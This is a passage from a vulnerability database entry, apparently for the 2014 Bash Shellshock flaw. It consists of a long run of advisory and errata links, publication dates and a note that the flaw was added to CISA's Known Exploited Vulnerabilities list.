bugtraq&m=141577137423233&w=2http://marc.info/?l=bugtraq&m=141577241923505&w=2http://marc.info/?l=bugtraq&m=141577297623641&w=2http://marc.info/?l=bugtraq&m=141585637922673&w=2http://marc.info/?l=bugtraq&m=141694386919794&w=2http://marc.info/?l=bugtraq&m=141879528318582&w=2http://marc.info/?l=bugtraq&m=142113462216480&w=2http://marc.info/?l=bugtraq&m=142118135300698&w=2http://marc.info/?l=bugtraq&m=142358026505815&w=2http://marc.info/?l=bugtraq&m=142358078406056&w=2http://marc.info/?l=bugtraq&m=142546741516006&w=2http://marc.info/?l=bugtraq&m=142719845423222&w=2http://marc.info/?l=bugtraq&m=142721162228379&w=2http://marc.info/?l=bugtraq&m=142805027510172&w=2http://packetstormsecurity.com/files/128517/VMware-Security-Advisory-2014-0010.htmlhttp://packetstormsecurity.com/files/128567/CA-Technologies-GNU-Bash-Shellshock.htmlhttp://packetstormsecurity.com/files/128573/Apache-mod_cgi-Remote-Command-Execution.htmlhttp://packetstormsecurity.com/files/137376/IPFire-Bash-Environment-Variable-Injection-Shellshock.htmlhttp://packetstormsecurity.com/files/161107/SonicWall-SSL-VPN-Shellshock-Remote-Code-Execution.htmlhttp://rhn.redhat.com/errata/RHSA-2014-1293.htmlhttp://rhn.redhat.com/errata/RHSA-2014-1294.htmlhttp://rhn.redhat.com/errata/RHSA-2014-1295.htmlhttp://rhn.redhat.com/errata/RHSA-2014-1354.htmlhttp://seclists.org/fulldisclosure/2014/Oct/0http://secunia.com/advisories/58200http://secunia.com/advisories/59272http://secunia.com/advisories/59737http://secunia.com/advisories/59907http://secunia.com/advisories/60024http://secunia.com/advisories/60034http://secunia.com/advisories/60044http://secunia.com/advisories/60055http://secunia.com/advisories/60063http://secunia.com/advisories/60193http://secunia.com/advisories/60325http://secunia.com/advisories/60433http://secunia.com/advisories/60947http://secunia.com/advisories/61065http://secunia.com/advisories/61128http://secunia.com/advisories/61129http://secunia.com/advisories/61188http://secunia.com/advisories/61283http://secunia.com/advisories/61287http://secunia.com/advisories/61291http://secunia.com/advisories/61312http://secunia.com/advisories/61313http://secunia.com/advisories/61328http://secunia.com/advisories/61442http://secunia.com/advisories/61471http://secunia.com/advisories/61485http://secunia.com/advisories/61503http://secunia.com/advisories/61542http://secunia.com/advisories/61547http://secunia.com/advisories/61550http://secunia.com/advisories/61552http://secunia.com/advisories/61565http://secunia.com/advisories/61603http://secunia.com/advisories/61633http://secunia.com/advisories/61641http://secunia.com/advisories/61643http://secunia.com/advisories/61654http://secunia.com/advisories/61676http://secunia.com/advisories/61700http://secunia.com/advisories/61703http://secunia.com/advisories/61711
+ 241 more references
2014-09-24
Published
2022-01-28
Added to CISA KEV
Exploited in the wild